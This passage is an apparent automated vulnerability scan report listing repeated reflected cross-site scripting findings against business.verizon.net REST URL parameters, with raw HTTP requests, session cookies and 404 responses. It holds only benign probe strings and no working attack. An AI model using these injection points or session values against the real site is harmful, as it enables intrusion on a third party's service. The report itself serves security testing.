Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2e7dae(a)4294be2dc23 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 106
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:13 GMT
Connection: close
Set-Cookie: SaasSessionID=Q5y4MnKd6BZc2JqyLcNZRyRMWNGTvLLHsFTpXRxmwF3v8Q1TdYgV!-1644393018; path=/

Resource /SMBPortal/smb/VerizonDiscountProgram_2e7dae(a)4294be2dc23 could not be resolved for locale null.

2.315. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3c976(a)c99765c65b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal3c976(a)c99765c65b/smb/mkp_landing_categoryPanel HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 106
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:14 GMT
Connection: close
Set-Cookie: SaasSessionID=Q9HCMnKpjQb2gkNQyHyH9MKkpTjLZ31y58nxWzpsh7K7LKnkpKGq!-1644393018; path=/

Resource /SMBPortal3c976(a)c99765c65b/smb/mkp_landing_categoryPanel could not be resolved for locale null.

2.316. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 20721(a)c015c398b91 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb20721(a)c015c398b91/mkp_landing_categoryPanel HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 107
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:14 GMT
Connection: close
Set-Cookie: SaasSessionID=YhVrMnKp2LnvZFM5DKTyL1cBbJJ6V7qJQLyS2nJrG51VwQ7JW14D!-1644393018; path=/

Resource /SMBPortal/smb20721(a)c015c398b91/mkp_landing_categoryPanel could not be resolved for locale null.

2.317. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a0bf1(a)55f1cdb6ae0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanela0bf1(a)55f1cdb6ae0 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 107
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:14 GMT
Connection: close
Set-Cookie: SaasSessionID=Tpn4MnKp7QHT9zPSFKGhTnJjmDDQPqWJBqHMNHq4nTr2gJpKSz8b!-1644393018; path=/

Resource /SMBPortal/smb/mkp_landing_categoryPanela0bf1(a)55f1cdb6ae0 could not be resolved for locale null.

2.318. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a97a3(a)1a297c5b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortala97a3(a)1a297c5b30/smb/mkp_landing_resourceLinks HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 106
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:19 GMT
Connection: close
Set-Cookie: SaasSessionID=1vQSMnKDF5k4xJ42MTLzLLy3PGhRGvGTTyX6RpcTDDKTy4M1Qhfn!-1644393018; path=/

Resource /SMBPortala97a3(a)1a297c5b30/smb/mkp_landing_resourceLinks could not be resolved for locale null.

2.319. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4ed5a(a)43552f0978c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb4ed5a(a)43552f0978c/mkp_landing_resourceLinks HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 107
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:19 GMT
Connection: close
Set-Cookie: SaasSessionID=VLwyMnKDLzsq4llmg1v1F4QdtzrvLTLQf2lphYdBZtN21ZT6lBnq!-1644393018; path=/

Resource /SMBPortal/smb4ed5a(a)43552f0978c/mkp_landing_resourceLinks could not be resolved for locale null.

2.320. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 51a11(a)014af2c8804 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks51a11(a)014af2c8804 HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 107
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:20 GMT
Connection: close
Set-Cookie: SaasSessionID=RnJPMnKDH6mtCShnxLtkJsnff32N7vzKR2VhrwV5gNwJNQdrLLfQ!-1644393018; path=/

Resource /SMBPortal/smb/mkp_landing_resourceLinks51a11(a)014af2c8804 could not be resolved for locale null.

2.321. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 38701(a)a1a6dbefdfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal38701(a)a1a6dbefdfb/smb/mkp_landing_solutionrecommender HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 113
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:14 GMT
Connection: close
Set-Cookie: SaasSessionID=Dj78MnKpb51b0JbGQlLgzJG3xf6B9kV2GK17mr2vnLTzG6n1mjYd!-1644393018; path=/

Resource /SMBPortal38701(a)a1a6dbefdfb/smb/mkp_landing_solutionrecommender could not be resolved for locale null.

2.322. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6013c(a)bbebae9ee1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb6013c(a)bbebae9ee1/mkp_landing_solutionrecommender HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 112
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:15 GMT
Connection: close
Set-Cookie: SaasSessionID=HTT7MnKfpFWFh1YPk1GQbV16JSfSTKsCTVL32zw7pQ6MrKz0vzs2!-1644393018; path=/

Resource /SMBPortal/smb6013c(a)bbebae9ee1/mkp_landing_solutionrecommender could not be resolved for locale null.

2.323. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 682ab(a)2608c8ae95b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender682ab(a)2608c8ae95b HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hvariable=0; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx; amlbcookie=02; state=; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; product_type=Unknown; tzone=360; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; lob=consumer; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; WT_FPC=id=295ebef59a6a31dd2391290211170846:lv=1290211188199:ss=1290211170846; SaasSessionID=H7f4MnrS4xg0326JLHv6hLvK8DjpTyWKV1kpXbqcnqJGVGVBqKGC!-1644393018; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; CP=null*;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 113
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 04:12:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:12:15 GMT
Connection: close
Set-Cookie: SaasSessionID=nw38MnKf2WPvp47yYLpYLYdrZGkvvN7DwKthPGPYgFyRNRFDhcjs!-1644393018; path=/

Resource /SMBPortal/smb/mkp_landing_solutionrecommender682ab(a)2608c8ae95b could not be resolved for locale null.

2.324. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4370e(a)d757b73798 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal4370e(a)d757b73798/smb/mkp_landing_verizonBusinessRewards HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
